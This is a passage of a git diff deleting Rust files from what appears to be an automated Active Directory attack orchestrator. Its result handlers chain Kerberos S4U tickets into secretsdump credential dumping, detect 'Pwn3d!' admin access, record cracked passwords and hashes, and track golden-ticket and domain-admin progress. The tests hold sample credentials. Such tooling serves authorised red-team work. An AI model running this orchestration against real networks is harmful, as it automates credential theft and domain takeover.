- if let Some(ref payload) = result.result { - auto_chain_s4u_secretsdump(payload, dispatcher, &completed.task_id).await; - } - - if result.success { - if let Some(ref payload) = result.result { - check_golden_ticket_completion(payload, &completed.task_id, dispatcher).await; - } - } - - if result.success { - if let Some(vuln_id) = completed - .task_id - .starts_with("exploit_") - .then(|| { - result - .result - .as_ref() - .and_then(|r| r.get("vuln_id")) - .and_then(|v| v.as_str()) - .map(|s| s.to_string()) - }) - .flatten() - { - info!(vuln_id = %vuln_id, task_id = %task_id, "Marking vulnerability as exploited"); - if let Err(e) = dispatcher - .state - .mark_exploited(&dispatcher.queue, &vuln_id) - .await - { - warn!(err = %e, vuln_id = %vuln_id, "Failed to mark vulnerability exploited"); - } - } - } - - if let Some(ref key) = cred_key { - if has_lockout_in_result(result) { - if let Some((username, domain)) = key.split_once('@') { - warn!( - credential = %key, - task_id = %task_id, - "Credential quarantined for 5 min: lockout detected" - ); - dispatcher - .state - .write() - .await - .quarantine_credential(username, domain); - } - } - } - - dispatcher.credential_access_notify.notify_waiters(); - dispatcher.delegation_notify.notify_waiters(); - - let _ = dispatcher.notify_state_update().await; -} - -/// Get the default domain from state (first domain, or empty string). -async fn get_default_domain(dispatcher: &Arc<Dispatcher>) -> String { - let state = dispatcher.state.read().await; - state.domains.first().cloned().unwrap_or_default() -} - -/// S4U auto-chain: detect .ccache ticket in task output and dispatch secretsdump. -/// -/// Mirrors Python's `_auto_chain_s4u_lateral_movement` — when a task produces a -/// Kerberos ticket file (.ccache), automatically dispatch a secretsdump task using -/// that ticket. This chains S4U/delegation → secretsdump without waiting for the -/// next automation cycle. -async fn auto_chain_s4u_secretsdump(payload: &Value, dispatcher: &Arc<Dispatcher>, task_id: &str) { - // Collect ONLY raw tool output fields — never LLM-generated summaries. - let mut text_parts: Vec<&str> = Vec::new(); - for key in &["tool_output", "output"] { - if let Some(s) = payload.get(*key).and_then(|v| v.as_str()) { - text_parts.push(s); - } - } - if let Some(arr) = payload.get("tool_outputs").and_then(|v| v.as_array()) { - for item in arr { - if let Some(s) = item.as_str() { - text_parts.push(s); - } else if let Some(s) = item.get("output").and_then(|v| v.as_str()) { - text_parts.push(s); - } - } - } - - let combined = text_parts.join("\n"); - let ticket_path = match ares_llm::routing::extract_ticket_path(&combined) { - Some(p) => p, - None => return, // No .ccache found - }; - - info!( - task_id = %task_id, - ticket_path = %ticket_path, - "Detected .ccache ticket — chaining secretsdump" - ); - - // Try to extract target from the task params (target_spn → host) or ccache filename - let target_ip = payload - .get("target_spn") - .and_then(|v| v.as_str()) - .and_then(ares_llm::routing::extract_host_from_spn) - .or_else(|| { - // Try to parse target from ccache filename: - // Administrator@cifs_dc01.contoso.local@CONTOSO.LOCAL.ccache - let fname = ticket_path.rsplit('/').next().unwrap_or(&ticket_path); - if let Some(at_pos) = fname.find('@') { - let after = &fname[at_pos + 1..]; - // Extract hostname: cifs_dc01.contoso.local@REALM.ccache - let host_part = after.split('@').next().unwrap_or(after).replace('_', "."); - // Remove the service prefix (cifs.
→ dc01.contoso.local) - if let Some(dot_pos) = host_part.find('.') { - let candidate = &host_part[dot_pos + 1..]; - if candidate.contains('.') { - return Some(candidate.to_string()); - } - } - } - None - }) - .or_else(|| { - // Fallback: use target_ip from the task payload - payload - .get("target_ip") - .and_then(|v| v.as_str()) - .map(|s| s.to_string()) - }) - .or_else(|| { - payload - .get("target") - .and_then(|v| v.as_str()) - .map(|s| s.to_string()) - }); - - let target_ip = match target_ip { - Some(ip) => ip, - None => { - warn!(task_id = %task_id, "S4U auto-chain: .ccache found but no target could be determined"); - return; - } - }; - - // Resolve target IP if it's a hostname - let resolved_ip = { - let state = dispatcher.state.read().await; - // Check if target_ip is actually an IP already - if target_ip.parse::<std::net::IpAddr>().is_ok() { - target_ip.clone() - } else { - // It's a hostname — look up in hosts - state - .hosts - .iter() - .find(|h| h.hostname.to_lowercase() == target_ip.to_lowercase()) - .map(|h| h.ip.clone()) - .unwrap_or(target_ip.clone()) - } - }; - - let domain = payload.get("domain").and_then(|v| v.as_str()).unwrap_or(""); - - // Dispatch secretsdump with ticket (no password needed). - // Must include username — secretsdump requires it even with -k -no-pass. - // The S4U impersonates Administrator, so use that as default. - let username = payload - .get("impersonate") - .and_then(|v| v.as_str()) - .unwrap_or("Administrator"); - let sd_payload = serde_json::json!({ - "technique": "secretsdump", - "techniques": ["secretsdump"], - "target_ip": resolved_ip, - "username": username, - "domain": domain, - "ticket_path": ticket_path, - "no_pass": true, - }); - - match dispatcher - .throttled_submit("credential_access", "credential_access", sd_payload, 2) - .await - { - Ok(Some(new_task_id)) => { - info!( - parent_task = %task_id, - chained_task = %new_task_id, - target = %resolved_ip, - ticket = %ticket_path, - "S4U auto-chain: secretsdump dispatched with ticket" - ); - } - Ok(None) => {} - Err(e) => warn!(err = %e, "S4U auto-chain: failed to dispatch secretsdump"), - } -} - -/// Extract discoveries from raw text fields in the result payload. -/// -/// Collects text from raw tool output fields ("tool_output", "output", "tool_outputs") -/// and runs regex-based extraction on the combined text. This mirrors Python's -/// `_process_output_text()` — a safety net that catches discoveries the per-tool -/// parsers or LLM-reported structured data may have missed. -async fn extract_from_raw_text( - payload: &Value, - dispatcher: &Arc<Dispatcher>, - default_domain: &str, -) { - // Only parse tool_outputs — actual tool stdout collected by the agent loop. - // The result payload's "summary", "result", and "output" fields are all - // LLM-generated prose and MUST NOT be fed into regex extractors (they produce - // false positives like "Password : only" from conversational text). - // - // Structured discoveries from tool-call parsers are already handled by - // extract_discoveries() via the "discoveries" key — this pass is a secondary - // safety net for raw tool stdout that parsers may have missed.
- let mut text_parts: Vec<&str> = Vec::new(); - - if let Some(arr) = payload.get("tool_outputs").and_then(|v| v.as_array()) { - for item in arr { - if let Some(s) = item.as_str() { - text_parts.push(s); - } else if let Some(s) = item.get("output").and_then(|v| v.as_str()) { - text_parts.push(s); - } - } - } - - if text_parts.is_empty() { - return; - } - - // Process each tool output independently to prevent stateful parsers - // (e.g. extract_plaintext_passwords's current_user tracker) from leaking - // context across unrelated tool calls — a joined string caused false - // credential attribution (e.g. john.smith:Summer2025 from stale context). - let mut extracted = output_extraction::TextExtractions::default(); - for part in &text_parts { - let partial = output_extraction::extract_from_output_text(part, default_domain); - extracted.credentials.extend(partial.credentials); - extracted.hashes.extend(partial.hashes); - extracted.hosts.extend(partial.hosts); - extracted.users.extend(partial.users); - extracted.shares.extend(partial.shares); - } - - if extracted.is_empty() { - return; - } - - let mut new_count = 0usize; - - for cred in extracted.credentials { - let is_cracked = cred.source.starts_with("cracked:"); - let cracked_username = cred.username.clone(); - let cracked_domain = cred.domain.clone(); - let cracked_password = cred.password.clone(); - match dispatcher - .state - .publish_credential(&dispatcher.queue, cred) - .await - { - Ok(true) => { - new_count += 1; - // When a cracked credential is published, update the corresponding - // hash's cracked_password field in state and Redis. - if is_cracked { - let _ = dispatcher - .state - .update_hash_cracked_password( - &dispatcher.queue, - &cracked_username, - &cracked_domain, - &cracked_password, - ) - .await; - } - } - Ok(false) => {} // duplicate - Err(e) => warn!(err = %e, "Failed to publish text-extracted credential"), - } - } - - for hash in extracted.hashes { - match dispatcher.state.publish_hash(&dispatcher.queue, hash).await { - Ok(true) => new_count += 1, - Ok(false) => {} - Err(e) => warn!(err = %e, "Failed to publish text-extracted hash"), - } - } - - for host in extracted.hosts { - let _ = dispatcher.state.publish_host(&dispatcher.queue, host).await; - } - - // Users intentionally NOT published from raw text extraction. - // The DOMAIN\user regex matches every wordlist entry in kerbrute/ASREProast - // output (e.g. "[-] User sql_svc doesn't have UF_DONT_REQUIRE_PREAUTH set"). - // Only per-tool parsers (kerberos_enum, netexec_user_enum) produce verified - // users gated by KDC response patterns. - - for share in extracted.shares { - match dispatcher - .state - .publish_share(&dispatcher.queue, share) - .await - { - Ok(true) => new_count += 1, - Ok(false) => {} - Err(e) => warn!(err = %e, "Failed to publish text-extracted share"), - } - } - - // Pwn3d! detection: scan raw text for admin indicators and upgrade credentials. - // netexec output like "[+] DOMAIN\user:password (Pwn3d!)" means the credential - // has local admin rights. Mark existing credentials as is_admin and trigger - // immediate high-priority secretsdump. - // Check each tool output independently (joining is safe here — Pwn3d! is a - // standalone marker with no stateful context to leak). 
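The netexec line format that `detect_and_upgrade_admin_credentials` (in `admin_checks.rs` above) pulls the principal out of looks roughly like this, with the spacing condensed:

```rust
#[test]
fn parses_pwn3d_principal() {
    // Typical netexec success line: "[+] DOMAIN\user:password (Pwn3d!)".
    let line = r"SMB 10.0.0.5 445 DC01 [+] CONTOSO\jdoe:Winter2024! (Pwn3d!)";
    let after_plus = line.split("[+]").nth(1).unwrap().trim();
    let (domain, rest) = after_plus.split_once('\\').unwrap();
    let username = rest.split(':').next().unwrap();
    assert_eq!((domain, username), ("CONTOSO", "jdoe"));
}
```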
- for part in &text_parts { - if part.contains("Pwn3d!") { - detect_and_upgrade_admin_credentials(part, dispatcher).await; - } - } - - if new_count > 0 { - info!( - count = new_count, - "Published new discoveries from raw text extraction" - ); - } -} - -/// Extract credentials, hashes, hosts, vulns, and shares from a result payload. -async fn extract_discoveries(payload: &Value, dispatcher: &Arc<Dispatcher>) -> Result<()> { - let mut parsed = parse_discoveries(payload); - - // Resolve credential lineage (parent_id / attack_step) before publishing. - // Read lock is released before any publish calls (which take write locks). - { - let state = dispatcher.state.read().await; - for cred in &mut parsed.credentials { - if cred.parent_id.is_none() { - let (pid, step) = resolve_parent_id( - &state.credentials, - &state.hashes, - &cred.source, - &cred.username, - &cred.domain, - None, - None, - ); - cred.parent_id = pid; - cred.attack_step = step; - } - } - for hash in &mut parsed.hashes { - if hash.parent_id.is_none() { - let (pid, step) = resolve_parent_id( - &state.credentials, - &state.hashes, - &hash.source, - &hash.username, - &hash.domain, - None, - None, - ); - hash.parent_id = pid; - hash.attack_step = step; - } - } - } - - for cred in parsed.credentials { - // Capture fields before move for timeline event - let source = cred.source.clone(); - let username = cred.username.clone(); - let domain = cred.domain.clone(); - let password = cred.password.clone(); - let is_admin = cred.is_admin; - let is_cracked = source.starts_with("cracked"); - match dispatcher - .state - .publish_credential(&dispatcher.queue, cred) - .await - { - Ok(true) => { - debug!("Published new credential from result"); - create_credential_timeline_event(dispatcher, &source, &username, &domain, is_admin) - .await; - // When a cracked credential is published, update the corresponding - // hash's cracked_password field in state and Redis.
- if is_cracked { - let _ = dispatcher - .state - .update_hash_cracked_password( - &dispatcher.queue, - &username, - &domain, - &password, - ) - .await; - } - } - Ok(false) => {} // duplicate - Err(e) => warn!(err = %e, "Failed to publish credential"), - } - } - - for hash in parsed.hashes { - // Capture fields before move for timeline event - let username = hash.username.clone(); - let domain = hash.domain.clone(); - let hash_type = hash.hash_type.clone(); - let hash_value = hash.hash_value.clone(); - let source = hash.source.clone(); - match dispatcher.state.publish_hash(&dispatcher.queue, hash).await { - Ok(true) => { - debug!("Published new hash from result"); - create_hash_timeline_event( - dispatcher, - &username, - &domain, - &hash_type, - &hash_value, - &source, - ) - .await; - } - Ok(false) => {} - Err(e) => warn!(err = %e, "Failed to publish hash"), - } - } - - for host in parsed.hosts { - let _ = dispatcher.state.publish_host(&dispatcher.queue, host).await; - } - - for user in parsed.users { - match dispatcher.state.publish_user(&dispatcher.queue, user).await { - Ok(true) => debug!("Published new user from result"), - Ok(false) => {} - Err(e) => warn!(err = %e, "Failed to publish user"), - } - } - - for vuln in parsed.vulnerabilities { - let _ = dispatcher - .state - .publish_vulnerability(&dispatcher.queue, vuln) - .await; - } - - for share in parsed.shares { - match dispatcher - .state - .publish_share(&dispatcher.queue, share) - .await - { - Ok(true) => debug!("Published new share from result"), - Ok(false) => {} - Err(e) => warn!(err = %e, "Failed to publish share"), - } - } - - // Extract trusted_domains from parser output - if let Some(trusts) = payload.get("trusted_domains").and_then(|v| v.as_array()) { - for trust_val in trusts { - if let Ok(trust) = - serde_json::from_value::<ares_core::models::TrustInfo>(trust_val.clone()) - { - match dispatcher - .state - .publish_trust_info(&dispatcher.queue, trust) - .await - { - Ok(true) => info!("Published new trust relationship from result"), - Ok(false) => {} - Err(e) => warn!(err = %e, "Failed to publish trust info"), - } - } - } - } - - Ok(()) -} diff --git a/ares-orchestrator/src/result_processing/parsing.rs b/ares-orchestrator/src/result_processing/parsing.rs deleted file mode 100644 index dc850d64..00000000 --- a/ares-orchestrator/src/result_processing/parsing.rs +++ /dev/null @@ -1,159 +0,0 @@ -//! Pure parsing functions for result payloads -- no IO, no Redis. - -use serde_json::Value; - -use ares_core::models::{Credential, Hash, Host, Share, User, VulnerabilityInfo}; - -/// Parsed discoveries from a JSON result payload. -#[derive(Debug, Default)] -pub(crate) struct ParsedDiscoveries { - pub credentials: Vec<Credential>, - pub hashes: Vec<Hash>, - pub hosts: Vec<Host>, - pub users: Vec<User>, - pub vulnerabilities: Vec<VulnerabilityInfo>, - pub shares: Vec<Share>, -} - -/// Resolve the parent credential or hash for a newly discovered item.
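The resolver that follows encodes two lineage rules: a `cracked*` credential descends from the newest matching hash, and anything discovered while running as a different input principal descends from that principal's credential or hash. A worked example of the first rule, using the `Hash` field set from the tests in this patch:

```rust
#[test]
fn cracked_credential_descends_from_its_hash() {
    let h = Hash {
        id: "h1".to_string(),
        username: "jdoe".to_string(),
        hash_value: "$krb5asrep$23$jdoe@CONTOSO.LOCAL$aaaa".to_string(),
        hash_type: "asrep".to_string(),
        domain: "contoso.local".to_string(),
        cracked_password: None,
        source: String::new(),
        discovered_at: None,
        parent_id: None,
        attack_step: 2,
        aes_key: None,
    };
    // Rule 1: "cracked*" sources attach to the newest matching hash,
    // one attack step deeper than the hash itself.
    let (parent, step) =
        resolve_parent_id(&[], &[h], "cracked", "jdoe", "contoso.local", None, None);
    assert_eq!((parent.as_deref(), step), (Some("h1"), 3));
}
```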
-pub(crate) fn resolve_parent_id( - credentials: &[Credential], - hashes: &[Hash], - source: &str, - username: &str, - domain: &str, - input_username: Option<&str>, - input_domain: Option<&str>, -) -> (Option<String>, i32) { - if source.starts_with("cracked") { - if let Some(h) = hashes.iter().rev().find(|h| { - h.username.eq_ignore_ascii_case(username) - && (domain.is_empty() || h.domain.eq_ignore_ascii_case(domain)) - }) { - return (Some(h.id.clone()), h.attack_step + 1); - } - } - if let Some(in_user) = input_username.filter(|u| !u.is_empty()) { - let in_domain = input_domain.unwrap_or(""); - let is_same = in_user.eq_ignore_ascii_case(username) - && (in_domain.eq_ignore_ascii_case(domain) - || in_domain.is_empty() - || domain.is_empty()); - if !is_same { - if let Some(c) = credentials.iter().rev().find(|c| { - c.username.eq_ignore_ascii_case(in_user) - && (in_domain.is_empty() - || c.domain.is_empty() - || c.domain.eq_ignore_ascii_case(in_domain)) - }) { - return (Some(c.id.clone()), c.attack_step + 1); - } - if let Some(h) = hashes.iter().rev().find(|h| { - h.username.eq_ignore_ascii_case(in_user) - && (in_domain.is_empty() - || h.domain.is_empty() - || h.domain.eq_ignore_ascii_case(in_domain)) - }) { - return (Some(h.id.clone()), h.attack_step + 1); - } - } - } - (None, 0) -} - -pub(crate) fn parse_discoveries(payload: &Value) -> ParsedDiscoveries { - let mut result = ParsedDiscoveries::default(); - - if let Some(creds) = payload.get("credentials").and_then(|v| v.as_array()) { - for cred_val in creds { - if let Ok(cred) = serde_json::from_value::<Credential>(cred_val.clone()) { - result.credentials.push(cred); - } - } - } - if let Some(cred_val) = payload.get("credential") { - if let Ok(cred) = serde_json::from_value::<Credential>(cred_val.clone()) { - result.credentials.push(cred); - } - } - if let Some(cracked) = payload.get("cracked_password").and_then(|v| v.as_str()) { - if let Some(username) = payload.get("username").and_then(|v| v.as_str()) { - let domain = payload.get("domain").and_then(|v| v.as_str()).unwrap_or(""); - result.credentials.push(Credential { - id: uuid::Uuid::new_v4().to_string(), - username: username.to_string(), - password: cracked.to_string(), - domain: domain.to_string(), - source: "cracked".to_string(), - discovered_at: Some(chrono::Utc::now()), - is_admin: false, - parent_id: None, - attack_step: 0, - }); - } - } - if let Some(hashes) = payload.get("hashes").and_then(|v| v.as_array()) { - for hash_val in hashes { - if let Ok(hash) = serde_json::from_value::<Hash>(hash_val.clone()) { - result.hashes.push(hash); - } - } - } - if let Some(hosts) = payload.get("hosts").and_then(|v| v.as_array()) { - for host_val in hosts { - if let Ok(host) = serde_json::from_value::<Host>(host_val.clone()) { - result.hosts.push(host); - } - } - } - // Users -- defense-in-depth: only accept entries with a parser-verified source.
- const TRUSTED_USER_SOURCES: &[&str] = &["kerberos_enum", "netexec_user_enum"]; - if let Some(users) = payload.get("discovered_users").and_then(|v| v.as_array()) { - for user_val in users { - if let Ok(user) = serde_json::from_value::<User>(user_val.clone()) { - if TRUSTED_USER_SOURCES.contains(&user.source.as_str()) { - result.users.push(user); - } - } - } - } - if let Some(vulns) = payload.get("vulnerabilities").and_then(|v| v.as_array()) { - for vuln_val in vulns { - if let Ok(vuln) = serde_json::from_value::<VulnerabilityInfo>(vuln_val.clone()) { - result.vulnerabilities.push(vuln); - } - } - } - if result.vulnerabilities.is_empty() { - if let Some(vuln_val) = payload.get("vulnerability") { - if let Ok(vuln) = serde_json::from_value::<VulnerabilityInfo>(vuln_val.clone()) { - result.vulnerabilities.push(vuln); - } - } - } - if let Some(shares) = payload.get("shares").and_then(|v| v.as_array()) { - for share_val in shares { - if let Ok(share) = serde_json::from_value::<Share>(share_val.clone()) { - result.shares.push(share); - } - } - } - result -} - -/// Check if a payload contains domain admin indicators. Pure function. -pub(crate) fn has_domain_admin_indicator(payload: &Value) -> bool { - if payload.get("has_domain_admin").and_then(|v| v.as_bool()) == Some(true) { - return true; - } - if let Some(hashes) = payload.get("hashes").and_then(|v| v.as_array()) { - for hash_val in hashes { - if let Some(username) = hash_val.get("username").and_then(|v| v.as_str()) { - if username.to_lowercase() == "krbtgt" { - return true; - } - } - } - } - false -} diff --git a/ares-orchestrator/src/result_processing/tests.rs b/ares-orchestrator/src/result_processing/tests.rs deleted file mode 100644 index 69658a47..00000000 --- a/ares-orchestrator/src/result_processing/tests.rs +++ /dev/null @@ -1,211 +0,0 @@ -use super::parsing::{has_domain_admin_indicator, parse_discoveries}; -use serde_json::json; - -#[test] -fn test_parse_credentials_array() { - let payload = json!({ - "credentials": [ - {"id": "c1", "username": "admin", "password": "P@ss1", - "domain": "contoso.local", "source": "kerberoast", "is_admin": false, "attack_step": 0}, - {"id": "c2", "username": "svc_sql", "password": "SqlPass1", - "domain": "contoso.local", "source": "secretsdump", "is_admin": false, "attack_step": 0} - ] - }); - let parsed = parse_discoveries(&payload); - assert_eq!(parsed.credentials.len(), 2); - assert_eq!(parsed.credentials[0].username, "admin"); - assert_eq!(parsed.credentials[1].username, "svc_sql"); -} - -#[test] -fn test_parse_single_credential() { - let payload = json!({ - "credential": { - "id": "c1", "username": "admin", "password": "P@ss1", - "domain": "contoso.local", "source": "ntlm_relay", "is_admin": false, "attack_step": 0 - } - }); - let parsed = parse_discoveries(&payload); - assert_eq!(parsed.credentials.len(), 1); - assert_eq!(parsed.credentials[0].source, "ntlm_relay"); -} - -#[test] -fn test_parse_cracked_password() { - let payload = - json!({"cracked_password": "Summer2024!", "username": "jdoe", "domain": "contoso.local"}); - let parsed = parse_discoveries(&payload); - assert_eq!(parsed.credentials.len(), 1); - assert_eq!(parsed.credentials[0].username, "jdoe"); - assert_eq!(parsed.credentials[0].password, "Summer2024!"); - assert_eq!(parsed.credentials[0].source, "cracked"); -} - -#[test] -fn test_parse_cracked_password_without_username_ignored() { - let payload = json!({"cracked_password": "Summer2024!"}); - let parsed = parse_discoveries(&payload); - assert!(parsed.credentials.is_empty()); -} - -#[test] -fn test_parse_hashes() { - let payload =
json!({ - "hashes": [{"id": "h1", "username": "Administrator", "hash_value": "aad3b435:abcdef123456", - "hash_type": "NTLM", "domain": "contoso.local", "source": "secretsdump", - "is_cracked": false, "attack_step": 0}] - }); - let parsed = parse_discoveries(&payload); - assert_eq!(parsed.hashes.len(), 1); - assert_eq!(parsed.hashes[0].username, "Administrator"); - assert_eq!(parsed.hashes[0].hash_type, "NTLM"); -} - -#[test] -fn test_parse_hosts() { - let payload = json!({ - "hosts": [{"ip": "192.168.58.10", "hostname": "dc01.contoso.local", - "os": "Windows Server 2019", "is_dc": true, "open_ports": [88, 389, 445]}] - }); - let parsed = parse_discoveries(&payload); - assert_eq!(parsed.hosts.len(), 1); - assert_eq!(parsed.hosts[0].ip, "192.168.58.10"); - assert!(parsed.hosts[0].is_dc); -} - -#[test] -fn test_parse_users_with_trusted_source() { - let payload = json!({ - "discovered_users": [{"username": "jdoe", "domain": "contoso.local", - "source": "kerberos_enum", "is_admin": false}] - }); - let parsed = parse_discoveries(&payload); - assert_eq!(parsed.users.len(), 1); - assert_eq!(parsed.users[0].username, "jdoe"); -} - -#[test] -fn test_parse_users_rejects_untrusted_source() { - let payload = json!({ - "discovered_users": [ - {"username": "fake_admin", "domain": "contoso.local", "is_admin": false}, - {"username": "also_fake", "domain": "contoso.local", - "source": "llm_hallucination", "is_admin": false} - ] - }); - let parsed = parse_discoveries(&payload); - assert_eq!(parsed.users.len(), 0); -} - -#[test] -fn test_parse_vulnerabilities() { - let payload = json!({ - "vulnerabilities": [{"vuln_id": "vuln-001", "vuln_type": "constrained_delegation", - "target": "192.168.58.20", "discovered_by": "recon", - "details": {"account": "svc_sql"}, "recommended_agent": "privesc", - "priority": 3}] - }); - let parsed = parse_discoveries(&payload); - assert_eq!(parsed.vulnerabilities.len(), 1); - assert_eq!( - parsed.vulnerabilities[0].vuln_type, - "constrained_delegation" - ); -} - -#[test] -fn test_parse_shares() { - let payload = json!({ - "shares": [ - {"host": "192.168.58.10", "name": "SYSVOL", "permissions": "READ", "comment": "Logon server share"}, - {"host": "192.168.58.10", "name": "ADMIN$", "permissions": "READ,WRITE"} - ] - }); - let parsed = parse_discoveries(&payload); - assert_eq!(parsed.shares.len(), 2); - assert_eq!(parsed.shares[0].name, "SYSVOL"); - assert_eq!(parsed.shares[1].name, "ADMIN$"); -} - -#[test] -fn test_parse_empty_payload() { - let payload = json!({}); - let parsed = parse_discoveries(&payload); - assert!(parsed.credentials.is_empty()); - assert!(parsed.hashes.is_empty()); - assert!(parsed.hosts.is_empty()); - assert!(parsed.users.is_empty()); - assert!(parsed.vulnerabilities.is_empty()); - assert!(parsed.shares.is_empty()); -} - -#[test] -fn test_parse_malformed_entries_skipped() { - let payload = json!({ - "credentials": [ - {"username": "valid", "id": "c1", "password": "x", "domain": "d", - "source": "s", "is_admin": false, "attack_step": 0}, - {"bad_field": "not a credential"} - ], - "hashes": [{"not_a_hash": true}] - }); - let parsed = parse_discoveries(&payload); - assert_eq!(parsed.credentials.len(), 1); - assert!(parsed.hashes.is_empty()); -} - -#[test] -fn test_parse_mixed_payload() { - let payload = json!({ - "credentials": [{"id": "c1", "username": "admin", "password": "P@ss", - "domain": "contoso.local", "source": "test", "is_admin": true, "attack_step": 0}], - "hashes": [{"id": "h1", "username": "krbtgt", "hash_value": "abc123", "hash_type": "NTLM", - 
"domain": "contoso.local", "source": "secretsdump", "is_cracked": false, "attack_step": 0}], - "hosts": [{"ip": "192.168.58.10", "hostname": "dc01.contoso.local", "is_dc": true}], - "has_domain_admin": true, "domain_admin_path": "secretsdump -> Administrator" - }); - let parsed = parse_discoveries(&payload); - assert_eq!(parsed.credentials.len(), 1); - assert_eq!(parsed.hashes.len(), 1); - assert_eq!(parsed.hosts.len(), 1); -} - -#[test] -fn test_da_indicator_explicit_flag() { - assert!(has_domain_admin_indicator( - &json!({"has_domain_admin": true}) - )); -} - -#[test] -fn test_da_indicator_false_flag() { - assert!(!has_domain_admin_indicator( - &json!({"has_domain_admin": false}) - )); -} - -#[test] -fn test_da_indicator_krbtgt_hash() { - assert!(has_domain_admin_indicator( - &json!({"hashes": [{"username": "krbtgt", "hash_value": "abc"}]}) - )); -} - -#[test] -fn test_da_indicator_krbtgt_case_insensitive() { - assert!(has_domain_admin_indicator( - &json!({"hashes": [{"username": "KRBTGT", "hash_value": "abc"}]}) - )); -} - -#[test] -fn test_da_indicator_non_krbtgt_hash() { - assert!(!has_domain_admin_indicator( - &json!({"hashes": [{"username": "Administrator", "hash_value": "abc"}]}) - )); -} - -#[test] -fn test_da_indicator_empty_payload() { - assert!(!has_domain_admin_indicator(&json!({}))); -} diff --git a/ares-orchestrator/src/result_processing/timeline.rs b/ares-orchestrator/src/result_processing/timeline.rs deleted file mode 100644 index d1cb5a30..00000000 --- a/ares-orchestrator/src/result_processing/timeline.rs +++ /dev/null @@ -1,100 +0,0 @@ -//! Timeline event helpers. - -use std::sync::Arc; - -use crate::dispatcher::Dispatcher; - -pub(crate) async fn create_credential_timeline_event( - dispatcher: &Arc, - source: &str, - username: &str, - domain: &str, - is_admin: bool, -) { - let mut techniques: Vec = vec![if is_admin { - "T1078".to_string() - } else { - "T1552".to_string() - }]; - let source_lower = source.to_lowercase(); - if source_lower.contains("kerberoast") { - techniques.push("T1558.003".to_string()); - } - if source_lower.contains("asrep") || source_lower.contains("as-rep") { - techniques.push("T1558.004".to_string()); - } - if source_lower.contains("cracked") { - techniques.push("T1110".to_string()); - } - let event_id = format!( - "evt-cred-{}", - &uuid::Uuid::new_v4().simple().to_string()[..8] - ); - let event = serde_json::json!({ - "id": event_id, - "timestamp": chrono::Utc::now().to_rfc3339(), - "source": source, - "description": format!("Credential discovered: {domain}\\{username} via {source}"), - "mitre_techniques": techniques, - }); - let _ = dispatcher - .state - .persist_timeline_event(&dispatcher.queue, &event, &techniques) - .await; -} - -pub(crate) async fn create_hash_timeline_event( - dispatcher: &Arc, - username: &str, - domain: &str, - hash_type: &str, - hash_value: &str, - source: &str, -) { - let mut techniques: Vec = vec!["T1003".to_string()]; - let hash_value_lower = hash_value.to_lowercase(); - let hash_type_lower = hash_type.to_lowercase(); - let source_lower = source.to_lowercase(); - if hash_value_lower.contains("$krb5tgs$") - || matches!( - hash_type_lower.as_str(), - "kerberoast" | "krb5tgs" | "tgs-rep" | "tgs" - ) - || source_lower.contains("kerberoast") - { - techniques.push("T1558.003".to_string()); - } - if hash_value_lower.contains("$krb5asrep$") - || matches!(hash_type_lower.as_str(), "asrep" | "as-rep" | "krb5asrep") - || source_lower.contains("asrep") - || source_lower.contains("as-rep") - { - 
techniques.push("T1558.004".to_string()); - } - if hash_type_lower == "ntlm" - && (source_lower.contains("secretsdump") || source_lower.contains("dcsync")) - { - techniques.push("T1003.006".to_string()); - } - let is_critical = matches!(username.to_lowercase().as_str(), "krbtgt" | "administrator"); - let description = if is_critical { - format!("CRITICAL: Hash discovered: {domain}\\{username} ({hash_type})") - } else { - format!("Hash discovered: {domain}\\{username} ({hash_type})") - }; - let event_id = format!( - "evt-hash-{}", - &uuid::Uuid::new_v4().simple().to_string()[..8] - ); - let event = serde_json::json!({ - "id": event_id, - "timestamp": chrono::Utc::now().to_rfc3339(), - "source": source, - "description": description, - "mitre_techniques": techniques, - }); - let _ = dispatcher - .state - .persist_timeline_event(&dispatcher.queue, &event, &techniques) - .await; -} diff --git a/ares-orchestrator/src/results.rs b/ares-orchestrator/src/results.rs deleted file mode 100644 index d4829b09..00000000 --- a/ares-orchestrator/src/results.rs +++ /dev/null @@ -1,185 +0,0 @@ -//! Result consumption loop. -//! -//! A dedicated tokio task that polls Redis for completed task results and -//! feeds them back to the main orchestration loop via an mpsc channel. -//! Mirrors the Python `MonitoringMixin._result_consumer` but uses async -//! Rust instead of a dedicated thread. - -use std::sync::Arc; -use std::time::Duration; - -use anyhow::Result; -use tokio::sync::{mpsc, watch}; -use tracing::{debug, error, info, warn}; - -use crate::config::OrchestratorConfig; -use crate::routing::ActiveTaskTracker; -use crate::task_queue::{TaskQueue, TaskResult}; - -// --------------------------------------------------------------------------- -// CompletedTask — sent over the channel to the main loop -// --------------------------------------------------------------------------- - -/// A completed task result, ready for the orchestrator to process. -#[derive(Debug)] -pub struct CompletedTask { - pub task_id: String, - pub result: TaskResult, -} - -// --------------------------------------------------------------------------- -// Result consumer -// --------------------------------------------------------------------------- - -/// Spawn the result-consumer background task. -/// -/// Returns an mpsc receiver that the main loop reads from. -pub fn spawn_result_consumer( - queue: TaskQueue, - tracker: ActiveTaskTracker, - config: Arc, - mut shutdown: watch::Receiver, -) -> (tokio::task::JoinHandle<()>, mpsc::Receiver) { - // Bounded channel — back-pressure if the main loop can't keep up. - let (tx, rx) = mpsc::channel::(256); - - let handle = tokio::spawn(async move { - let mut consecutive_failures: u32 = 0; - let poll_interval = config.result_poll_interval; - - info!("Result consumer started"); - - loop { - // Check shutdown before each poll cycle - if *shutdown.borrow() { - info!("Result consumer shutting down"); - break; - } - - match consume_cycle(&queue, &tracker, &tx).await { - Ok(found) => { - if consecutive_failures > 0 { - info!( - prev_failures = consecutive_failures, - "Result consumer recovered" - ); - } - consecutive_failures = 0; - - if found > 0 { - debug!(results = found, "Consumed results"); - // When results arrive, poll again immediately instead - // of sleeping — results often come in bursts. 
